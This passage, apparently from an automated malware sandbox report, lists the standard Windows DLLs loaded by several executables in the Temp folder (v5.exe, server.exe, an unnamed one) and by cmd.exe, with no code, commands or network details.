              Source: C:\Windows\Temp\v5.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: msvcp60.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Temp\server.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: drprov.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: ntlanman.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: davclnt.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: davhlpr.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: profext.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
